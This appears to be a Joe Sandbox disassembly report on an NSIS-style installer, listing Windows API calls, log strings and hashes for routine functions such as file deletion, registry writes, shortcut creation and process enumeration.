                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                          • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                          Strings
                                                                                                          • \*.*, xrefs: 00406D03
                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                          • API String ID: 2035342205-3294556389
                                                                                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                          APIs
                                                                                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 3581403547-784952888
                                                                                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                          Strings
                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInstance
                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                          • API String ID: 542301482-1377821865
                                                                                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 1974802433-0
                                                                                                          • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                          • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                          • API String ID: 20674999-2124804629
                                                                                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                          APIs
                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                          • GetSysColor.USER32(?), ref: 004041AF
                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                          • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                          • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                          • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                          • String ID: @%F$N$open
                                                                                                          • API String ID: 3928313111-3849437375
                                                                                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                          APIs
                                                                                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                          • wsprintfA.USER32 ref: 00406B4D
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                          • String ID: F$%s=%s$NUL$[Rename]
                                                                                                          • API String ID: 565278875-1653569448
                                                                                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                          • String ID: F
                                                                                                          • API String ID: 941294808-1304234792
                                                                                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                          • API String ID: 1641139501-220328614
                                                                                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                          Strings
                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
